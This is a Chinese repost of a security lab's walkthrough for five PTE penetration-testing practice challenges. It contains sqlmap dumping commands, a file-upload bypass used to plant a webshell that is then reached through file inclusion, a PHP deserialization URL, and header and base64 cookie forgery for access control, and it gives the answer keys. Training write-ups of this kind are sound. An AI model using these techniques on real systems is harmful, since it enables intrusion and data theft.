当前位置:白度搜_经验知识百科全书 > 百科知识 > 百科大全 > PTE练习题解答 | CN
admin 百科大全

PTE练习题解答 | CN

PTE练习题解答 | CN,第1张

1.SQL注入

PTE练习题解答 | CN,PTE练习题解答,第2张

直接sqlmap跑一下

python sqlmap.py -u url --dbs

PTE练习题解答 | CN,PTE练习题解答,第3张

爆个表

python sqlmap.py -u url -D 2web --tables

PTE练习题解答 | CN,PTE练习题解答,第4张

爆列

python sqlmap.py -u url -D 2web -T IS_KEY --columns

PTE练习题解答 | CN,PTE练习题解答,第5张

接下来查看下内容

python sqlmap.py -u url -D 2web -T IS_KEY -C haha --dump

PTE练习题解答 | CN,PTE练习题解答,第6张

拿到key1:abcd1234

2.文件上传

PTE练习题解答 | CN,PTE练习题解答,第7张

发现是php的页面

PTE练习题解答 | CN,PTE练习题解答,第8张

发现上传失败,改改

PTE练习题解答 | CN,PTE练习题解答,第9张

改完传好了

PTE练习题解答 | CN,PTE练习题解答,第10张

找到路径,直接访问下

PTE练习题解答 | CN,PTE练习题解答,第11张

PTE练习题解答 | CN,PTE练习题解答,第12张

蚁剑连接

PTE练习题解答 | CN,PTE练习题解答,第13张

找到key.php,打开找到key2:a1b2c3d4

PTE练习题解答 | CN,PTE练习题解答,第14张

3.文件包含

PTE练习题解答 | CN,PTE练习题解答,第15张

查看url发现,强制添加.txt后缀

PTE练习题解答 | CN,PTE练习题解答,第16张

把第二题马改成.txt后缀的

PTE练习题解答 | CN,PTE练习题解答,第17张

访问下看看

PTE练习题解答 | CN,PTE练习题解答,第18张

返回题目访问下

PTE练习题解答 | CN,PTE练习题解答,第19张

蚁剑连接

PTE练习题解答 | CN,PTE练习题解答,第20张

找key

PTE练习题解答 | CN,PTE练习题解答,第21张

找到key3:abcdefgh

PTE练习题解答 | CN,PTE练习题解答,第22张

4.反序列化

PTE练习题解答 | CN,PTE练习题解答,第23张

来看一下php类型反序列化格式

s:3:'123'; 
<?php
echo serialize('123');
?>

PTE练习题解答 | CN,PTE练习题解答,第24张

编辑器看下文字长度

PTE练习题解答 | CN,PTE练习题解答,第25张

编辑下url

http://121.36.208.140:8894/start/index.php?str=s:44:'Whatever is worth doing is worth doing well.';

运行下得到key4:123456768

PTE练习题解答 | CN,PTE练习题解答,第26张

5.失效的访问控制

PTE练习题解答 | CN,PTE练习题解答,第27张

bp抓包访问下

发现只允许本地访问

改下

X-Forwarded——For:127.0.0.1

PTE练习题解答 | CN,PTE练习题解答,第28张

发现没有查看权限

PTE练习题解答 | CN,PTE练习题解答,第29张

发现username为url编码--->base64

PTE练习题解答 | CN,PTE练习题解答,第30张

bp解下码

PTE练习题解答 | CN,PTE练习题解答,第31张

然后把admin编码

PTE练习题解答 | CN,PTE练习题解答,第32张

复制替换拿到key5:12345678

PTE练习题解答 | CN,PTE练习题解答,第33张

结束

原文始发于微信公众号(CTS纵横安全实验室):PTE练习题解答

DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
白度搜_经验知识百科全书 » PTE练习题解答 | CN

admin 管理员组

分享到:

相关推荐

0条评论

发表评论

提供最优质的资源集合

立即查看 了解详情